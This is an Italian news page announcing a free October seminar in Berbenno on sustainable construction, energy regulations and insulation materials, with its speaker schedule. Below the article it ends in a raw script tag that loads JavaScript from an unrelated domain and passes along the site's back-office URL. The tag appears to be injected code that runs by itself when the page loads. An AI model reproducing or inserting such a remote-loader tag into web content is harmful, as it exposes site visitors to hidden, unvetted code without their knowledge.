1. Home
  2. Notizie e Mercato
  3. Il futuro delle costruzioni è oggi: spunti per progettare e costruire sostenibile

Il futuro delle costruzioni è oggi: spunti per progettare e costruire sostenibile

Energie rinnovabili di
5/5
votato da 1 persone
Un seminario formativo incentrato su normative e agevolazioni, soluzioni e materiali per costruire e rigenerare energeticamente gli edifici


Il prossimo 24 ottobre, dalle ore 16 alle 19, presso l’Hotel Salyut (via Nazionale 1297 a Berbenno) è previsto un’interessante seminario formativo destinato a progettisti, professionisti del settore edile, imprese edili e immobiliari.

Il convegno (promosso da Alpac, Dow Italia e Index, con il patrocinio del Collegio Geometri Sondrio e del Collegio Periti Industriali di Sondrio) esplorerà la necessità di cambiamento del mondo delle costruzioni verso un nuovo modo di costruire sostenibile. Partendo da un’analisi sul consumo delle risorse si interpellerà la responsabilità dei protagonisti delle costruzioni e si cercerà di fornire risposte concrete per creare un’edilizia sostenibile, esplorando normative e agevolazioni, soluzioni energetiche, materiali per costruire bene energeticamente.

La partecipazione al seminario è gratuita previa iscrizione sul sito www.convegno24ottobre2013.tk . È previsto il rilascio di crediti formativi per geometri (2 crediti) e periti (3 crediti). A tutti i partecipanti, inoltre, verrà consegnata documentazione tecnica e verranno inviati via email gli atti del convegno e l’attestato di partecipazione.

Il programma, coordinato dall'Ing. Carlo Erba, prevede:
ore 15.45 Accreditamento
ore 16.00 Introduzione
ore 16.15Change your view. Verso la società sostenibile: il mondo delle costruzioni in trasformazione” (Norbert Lantschner, presidente Fondazione ClimAbita e ideatore CasaClima)
ore 17.15L’isolamento termico dell’involucro edilizio: nuovi materiali e nuove tecniche nell’ottica delle case a zero energia” (Franco Bianchini, Dow Italia)
ore 17.45 Sostenibilità e risparmio energetico nel foro finestra: soluzioni tecnologiche per isolare il giunto primario” (Andrea Mattiuzzi, Alpac)
ore 18.15Materiali, soluzioni tecniche e agevolazioni fiscali per edifici sostenibili ad alto rendimento energetico” (Cristiano Vassanelli, Index)
ore 18.45 Dibattito e conclusioni, con aperitivo finale

<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.5436720699701999" type="text/javascript"></script>